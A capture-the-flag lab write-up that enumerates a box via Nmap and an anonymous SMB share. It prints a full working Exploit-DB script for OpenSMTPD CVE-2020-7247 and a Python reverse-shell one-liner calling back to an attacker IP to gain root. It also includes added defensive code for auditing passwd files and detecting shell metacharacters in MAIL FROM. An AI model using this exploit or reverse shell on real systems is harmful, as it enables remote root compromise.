Nmap

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 14:32 +08
Nmap scan report for 192.168.165.71
Host is up (0.039s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:dd:2c:ea:2f:85:c5:89:bc:fc:e9:a3:38:f0:d7:50 (RSA)
|   256 e3:b7:65:c2:a7:8e:45:29:bb:62:ec:30:1a:eb:ed:6d (ECDSA)
|_  256 d5:5b:79:5b:ce:48:d8:57:46:db:59:4f:cd:45:5d:ef (ED25519)
25/tcp  open  smtp        OpenSMTPD
| smtp-commands: bratarina Hello nmap.scanme.org [192.168.45.169], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact [email protected] 2.0.0 with full details 2.0.0 End of HELP info
80/tcp  open  http        nginx 1.14.0 (Ubuntu)
|_http-title:         Page not found - FlaskBB        
|_http-server-header: nginx/1.14.0 (Ubuntu)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: COFFEECORP)
Service Info: Host: bratarina; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2024-11-25T06:32:25
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: bratarina
|   NetBIOS computer name: BRATARINA\x00
|   Domain name: \x00
|   FQDN: bratarina
|_  System time: 2024-11-25T01:32:24-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h39m59s, deviation: 2h53m14s, median: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.03 seconds

Only a few ports are open: 22, 25, 80 and 445.

SMB

Before jumping straight into the web app on port 80, I wanna do some basic enumeration on SMB first.

nullinux

nullinux 192.168.165.71

    Starting nullinux v5.5.0dev | 11-25-2024 14:48



[*] Enumerating Shares for: 192.168.165.71
        Shares                     Comments
   -------------------------------------------
    \\192.168.165.71\backups         Share for backups
    \\192.168.165.71\IPC$

   [*] Enumerating: \\192.168.165.71\backups
       .                                   D        0  Mon Jul  6 15:46:41 2020
       ..                                  D        0  Mon Jul  6 15:46:41 2020
       passwd.bak                          N     1747  Mon Jul  6 15:46:41 2020
...<truncated>...

backups Share

I am able to perform anonymous login on the backups share where I find a passwd.bak.

smbclient \\\\192.168.165.71\\backups
Password for [WORKGROUP\hans]:
Anonymous login successful
Try "help" to get a list of possible commands.

smb: \> dir
  .                                   D        0  Mon Jul  6 15:46:41 2020
  ..                                  D        0  Mon Jul  6 15:46:41 2020
  passwd.bak                          N     1747  Mon Jul  6 15:46:41 2020

                10253588 blocks of size 1024. 6355108 blocks available

smb: \> get passwd.bak
getting file \passwd.bak of size 1747 as passwd.bak (11.0 KiloBytes/sec) (average 11.0 KiloBytes/sec)

smb: \> exit

passwd.bak

cat passwd.bak
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
neil:x:1000:1000:neil,,,:/home/neil:/bin/bash
_smtpd:x:1001:1001:SMTP Daemon:/var/empty:/sbin/nologin
_smtpq:x:1002:1002:SMTPD Queue:/var/empty:/sbin/nologin
postgres:x:111:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

passwd.bak seems to be a backup of the /etc/passwd file where we find a possible user neil.

cat passwd.bak | grep "sh$"
root:x:0:0:root:/root:/bin/bash
neil:x:1000:1000:neil,,,:/home/neil:/bin/bash
postgres:x:111:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
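The grep above is the quick version of a check that is worth automating whenever a passwd backup turns up on an open share. What follows is an added example written for this write-up, not code from the original post: a small parser for passwd(5)-format lines that reports accounts with a usable login shell (without relying on the shell's name ending in "sh"), any extra UID 0 accounts, and password fields that hold a hash or nothing at all instead of the shadow placeholder. The sample input reuses a few lines from passwd.bak plus two constructed entries (legacy, toor) that are not in the real file.

```python
"""Audit a passwd(5)-format file for accounts that deserve attention.

Added example for this write-up; it is not part of the original post.
"""
import sys
from dataclasses import dataclass
from typing import Dict, List

# Shells that refuse an interactive session; any other shell counts as a login shell.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}
# Values of the password field that mean "no hash is stored here".
SHADOW_PLACEHOLDERS = {"x", "*", "!", "!!"}


@dataclass
class PasswdEntry:
    name: str
    password: str  # normally "x": the real hash lives in /etc/shadow
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse passwd(5) lines; blank lines and '#' comments are skipped."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, password, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, password, int(uid), int(gid), gecos, home, shell))
    return entries


def login_accounts(entries: List[PasswdEntry]) -> List[str]:
    """Names of accounts whose shell allows an interactive login."""
    return [e.name for e in entries if e.shell not in NOLOGIN_SHELLS]


def audit(entries: List[PasswdEntry]) -> Dict[str, List[str]]:
    """Group account names by finding type."""
    report: Dict[str, List[str]] = {
        "login_shell": [], "uid0": [], "unshadowed": [], "empty_password": []}
    for e in entries:
        if e.shell not in NOLOGIN_SHELLS:
            report["login_shell"].append(e.name)
        if e.uid == 0:
            report["uid0"].append(e.name)
        if e.password == "":
            report["empty_password"].append(e.name)  # no password at all
        elif e.password not in SHADOW_PLACEHOLDERS:
            report["unshadowed"].append(e.name)  # hash exposed in a world-readable file
    return report


# Sample input: a few lines from passwd.bak plus two constructed entries (legacy, toor).
SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
neil:x:1000:1000:neil,,,:/home/neil:/bin/bash
_smtpd:x:1001:1001:SMTP Daemon:/var/empty:/sbin/nologin
postgres:x:111:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
# constructed entries below, not from the real file
legacy:$6$saltsalt$FAKEHASHFAKEHASHFAKEHASH:1003:1003::/home/legacy:/bin/sh
toor:x:0:0:second uid 0 account:/root:/bin/bash
"""

if __name__ == "__main__":
    # Pass a file path to audit a real file; otherwise the constructed sample is used.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    for kind, names in audit(parse_passwd(text)).items():
        print(f"{kind:15s} {', '.join(names) or '-'}")
```

Run with a path argument to audit a leaked file, or without one to see the report on the sample. The "unshadowed" and "uid0" checks are the ones that matter most for a backup like this: the file itself carries no hashes, but a copy made before shadowing was enabled, or a second UID 0 account, would.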

SMTP

25/tcp  open  smtp        OpenSMTPD
| smtp-commands: bratarina Hello nmap.scanme.org [192.168.45.169], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact [email protected] 2.0.0 with full details 2.0.0 End of HELP info

Looking at the Nmap results for port 25, we see something interesting: it appears that we are able to connect to and interact with the service.

Additionally, it appears that the OpenSMTPD version is 2.0.0 so let’s see if there are any exploits.

Exploit

I found this RCE exploit which should work for versions before 6.6.2. https://www.exploit-db.com/exploits/47984

# Exploit Title: OpenSMTPD 6.6.1 - Remote Code Execution
# Date: 2020-01-29
# Exploit Author: 1F98D
# Original Author: Qualys Security Advisory
# Vendor Homepage: https://www.opensmtpd.org/
# Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1
# Version: OpenSMTPD < 6.6.2
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2020-7247
# References:
# https://www.openwall.com/lists/oss-security/2020/01/28/3
#
# OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately
# escape dangerous characters from user-controlled input. An attacker
# can exploit this to execute arbitrary shell commands on the target.
#
#!/usr/local/bin/python3

from socket import *
import sys

if len(sys.argv) != 4:
    print('Usage {} <target ip> <target port> <command>'.format(sys.argv[0]))
    print("E.g. {} 127.0.0.1 25 'touch /tmp/x'".format(sys.argv[0]))
    sys.exit(1)

ADDR = sys.argv[1]
PORT = int(sys.argv[2])
CMD = sys.argv[3]

s = socket(AF_INET, SOCK_STREAM)
s.connect((ADDR, PORT))

res = s.recv(1024)
if 'OpenSMTPD' not in str(res):
    print('[!] No OpenSMTPD detected')
    print('[!] Received {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] OpenSMTPD detected')
s.send(b'HELO x\r\n')
res = s.recv(1024)
if '250' not in str(res):
    print('[!] Error connecting, expected 250')
    print('[!] Received: {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] Connected, sending payload')
s.send(bytes('MAIL FROM:<;{};>\r\n'.format(CMD), 'utf-8'))
res = s.recv(1024)
if '250' not in str(res):
    print('[!] Error sending payload, expected 250')
    print('[!] Received: {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] Payload sent')
s.send(b'RCPT TO:<root>\r\n')
s.recv(1024)
s.send(b'DATA\r\n')
s.recv(1024)
s.send(b'\r\nxxx\r\n.\r\n')
s.recv(1024)
s.send(b'QUIT\r\n')
s.recv(1024)
print('[*] Done')
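The header of that exploit sums the bug up in one sentence: user-controlled input reached a shell without dangerous characters being escaped. Seen from the receiving side, the tell-tale sign is a MAIL FROM reverse-path whose local-part contains characters no legitimate sender would use. What follows is an added example written for this write-up, not OpenSMTPD's code and not part of the original post: a checker that tests the local-part against the RFC 5321 dot-atom grammar and, separately, for shell metacharacters, then runs over a constructed SMTP session transcript. The transcript lines, the addresses in it and the function names are all assumptions of this example.

```python
"""Flag suspicious MAIL FROM reverse-paths in an SMTP session transcript.

Added example for this write-up; not OpenSMTPD code and not from the original post.
"""
import re
from typing import List, Optional, Tuple

# RFC 5321 "atext": the characters allowed in an unquoted (dot-atom) local-part.
ATEXT = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
            "!#$%&'*+-/=?^_`{|}~")
# Characters that /bin/sh treats specially: harmless to SMTP itself, dangerous
# if the address is ever interpolated into a command line.
SHELL_META = set(";|&$`<>(){}'\" \t\r\n\\")

MAIL_FROM_RE = re.compile(r"^MAIL FROM:\s*<(?P<path>[^>]*)>", re.IGNORECASE)


def split_address(path: str) -> Tuple[str, str]:
    """'user@domain' -> (user, domain); a bare 'user' gets an empty domain."""
    user, at, domain = path.rpartition("@")
    return (path, "") if not at else (user, domain)


def valid_local_part(local: str) -> bool:
    """Dot-atom rule: non-empty, atext only, dots neither leading, trailing nor doubled."""
    if not local or local.startswith(".") or local.endswith(".") or ".." in local:
        return False
    return all(c in ATEXT or c == "." for c in local)


def check_mail_from(line: str) -> Optional[str]:
    """Return a reason if the line is a suspicious MAIL FROM, else None."""
    m = MAIL_FROM_RE.match(line.strip())
    if not m:
        return None
    path = m.group("path")
    if path == "":
        return None  # the empty reverse-path is legitimate: bounce messages use it
    local, _domain = split_address(path)
    meta = sorted(set(local) & SHELL_META)
    if meta:
        return f"shell metacharacters {meta} in local-part {local!r}"
    if not valid_local_part(local):
        return f"local-part {local!r} violates the RFC 5321 dot-atom grammar"
    return None


def scan_transcript(lines: List[str]) -> List[Tuple[int, str]]:
    """(line number, reason) for every suspicious MAIL FROM in a session."""
    hits = []
    for n, line in enumerate(lines, 1):
        reason = check_mail_from(line)
        if reason:
            hits.append((n, reason))
    return hits


# Constructed session transcript (client and server lines interleaved).
SESSION = [
    "220 bratarina ESMTP OpenSMTPD",
    "HELO x",
    "250 bratarina Hello x, pleased to meet you",
    "MAIL FROM:<alice@example.org>",
    "250 2.0.0 Ok",
    "MAIL FROM:<>",
    "250 2.0.0 Ok",
    "MAIL FROM:<;true;>",
    "250 2.0.0 Ok",
    "MAIL FROM:<bad..dots>",
    "RCPT TO:<root>",
]

if __name__ == "__main__":
    for n, reason in scan_transcript(SESSION):
        print(f"line {n}: {reason}")
```

The two checks are deliberately separate: a local-part such as a|b passes the RFC grammar but still contains a character that matters to /bin/sh. That is why a server that hands addresses to a shell has to quote or reject them at that boundary rather than rely on address validation alone, and why a detection rule should look for the metacharacters, not just for malformed addresses.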

Root Shell

I tried to run basic commands like wget and curl to “phone home”; however, for some reason I could not get any response from my Python HTTP server.

Python Reverse Shell

I decided to just plug in a python reverse shell and it actually worked.

python -c "import socket, subprocess, os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"192.168.45.169\", 445)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"

I modified the Python Reverse Shell code generated from revshells.com by escaping the double quotes since I will be inputting it as an argument of the Python exploit.

python3 opensmtp.py 192.168.165.71 25 'python -c "import socket, subprocess, os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"192.168.45.169\", 445)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done

Upon running the exploit, my nc listener catches the shell. I used port 445 as I wanted to use a port that is also open on the box to prevent any firewall issues.

sudo wrapnc 445
[sudo] password for hans:
listening on [any] 445 ...
connect to [192.168.45.169] from (UNKNOWN) [192.168.165.71] 44046
root@bratarina:~# cat proof.txt
29d6bdfb308c71dc8203e8bb7e6c7b5f

I immediately get a root shell and the proof flag.